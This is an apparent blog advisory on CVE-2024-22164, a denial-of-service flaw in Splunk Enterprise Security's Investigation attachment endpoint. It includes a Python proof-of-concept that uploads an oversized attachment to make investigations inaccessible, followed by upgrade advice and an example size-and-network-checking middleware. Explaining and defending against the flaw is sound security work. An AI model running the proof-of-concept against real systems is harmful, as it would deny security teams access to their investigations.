In this long-read post, we will discuss a recently discovered vulnerability in Splunk Enterprise Security (ES) versions below 7.1.2. Identified by the Common Vulnerabilities and Exposures (CVE) ID CVE-2024-22164, this vulnerability allows an attacker to perform a denial of service (DoS) attack on the Investigation feature of Splunk ES by using investigation attachments.

We'll delve into the specifics of this vulnerability, provide a code snippet demonstrating the potential exploit, and discuss ways you can mitigate this risk in your own ES environment. We'll also include references to original sources and further reading for those interested in learning more about this issue.

Vulnerability Details

In Splunk ES versions below 7.1.2, the Investigation feature, which is used for conducting collaborative security investigations, contains a vulnerability in its attachment endpoint. This endpoint doesn't properly limit the size of the requests it processes, which may allow an attacker to upload a large investigation attachment and cause the Investigation to become inaccessible for other users.

Exploit

To exploit this vulnerability, an attacker would need to craft a request with a large investigation attachment and send it to the affected attachment endpoint, which would be processed without any proper size limitation checks. This can potentially cause the Investigation to become unresponsive or inaccessible, effectively denying legitimate users access to the feature.

Here's a code snippet showing a potential exploit using the Python Requests library:

import requests

# Replace the following with your Splunk ES instance URL and API token
splunk_url = "https://your_splunk_instance_url"
api_token = "your_api_token"

# Do not set Content-Type by hand: requests generates the multipart
# header, including the boundary, when files= is used
headers = {
    "Authorization": f"Splunk {api_token}"
}

# Craft a large investigation attachment by repeating a sample text
large_attachment = ("Sample text to fill the attachment " * 100000).encode("UTF-8")

# Prepare the request payload for the attachment endpoint
payload = {
    "attachment": ("attachment.txt", large_attachment)
}

# Send the request to the affected attachment endpoint
response = requests.post(f"{splunk_url}/services/investigation/attachment", headers=headers, files=payload)

if response.status_code == 201:
    print("Investigation attachment successfully uploaded.")
else:
    print("Error uploading attachment.")

Mitigations

Update your Splunk ES installation to version 7.1.2, which contains a patch for this issue. You can download the updated version from the Splunk website.

If you cannot currently update your ES instance, it is advised to monitor and control access to the Investigation attachment endpoint by implementing access controls, such as IP-based restrictions, user roles, or other authentication mechanisms suited to your environment.
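One way to apply these controls at a front-end layer you operate, as an added example that is not part of the original post and is not Splunk code: a WSGI middleware that admits attachment uploads only from analyst networks and only with a bounded, declared size. The path is the one used in the snippet above; the size cap, the network range and the names `check_attachment_request` and `AttachmentGuard` are assumptions made for illustration.

```python
import ipaddress

# Assumptions (not from Splunk): the path is the one used in the snippet above;
# the cap and the analyst network are constructed sample values.
ATTACHMENT_PATH = "/services/investigation/attachment"
MAX_ATTACHMENT_BYTES = 1 * 1024 * 1024
ANALYST_NETWORKS = [ipaddress.ip_network("10.20.0.0/24")]


def check_attachment_request(method, path, client_ip, content_length):
    """Return (status, reason); status 200 means the request may be forwarded."""
    if method != "POST" or ATTACHMENT_PATH not in path:
        return 200, "not an attachment upload"
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return 403, "unparseable client address"
    if not any(addr in net for net in ANALYST_NETWORKS):
        return 403, "client outside analyst networks"
    # Without Content-Length (e.g. a chunked upload) the size is unknown up front.
    if content_length in (None, ""):
        return 411, "Content-Length required"
    if not (content_length.isascii() and content_length.isdigit()):
        return 400, "malformed Content-Length"
    if int(content_length) > MAX_ATTACHMENT_BYTES:
        return 413, "attachment exceeds size cap"
    return 200, "ok"


class AttachmentGuard:
    """WSGI middleware that applies the check before the wrapped app runs."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        status, reason = check_attachment_request(
            environ.get("REQUEST_METHOD", ""),
            environ.get("PATH_INFO", ""),
            environ.get("REMOTE_ADDR", ""),
            environ.get("CONTENT_LENGTH"),
        )
        if status != 200:
            body = reason.encode("utf-8")
            start_response(f"{status} {reason}",
                           [("Content-Type", "text/plain"),
                            ("Content-Length", str(len(body)))])
            return [body]
        return self.app(environ, start_response)
```

The check trusts the declared length, so the server hosting it must also refuse to read a body past `Content-Length`.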

For more information about this vulnerability, you can refer to the following sources:

- CVE-2024-22164 entry on the CVE List
- Splunk Security Advisory
- Splunk's Documentation on Investigation Feature

Conclusion

CVE-2024-22164 represents a potentially serious vulnerability in Splunk ES versions below 7.1.2 that could allow an attacker to cause a denial of service to the Investigation feature using investigation attachments. To protect your environment from potential exploitation, it is recommended to update your Splunk ES installation to version 7.1.2 or later and closely monitor and control access to the Investigation attachment endpoint.

Timeline

Published on: 01/09/2024 17:15:12 UTC
Last modified on: 01/16/2024 17:40:17 UTC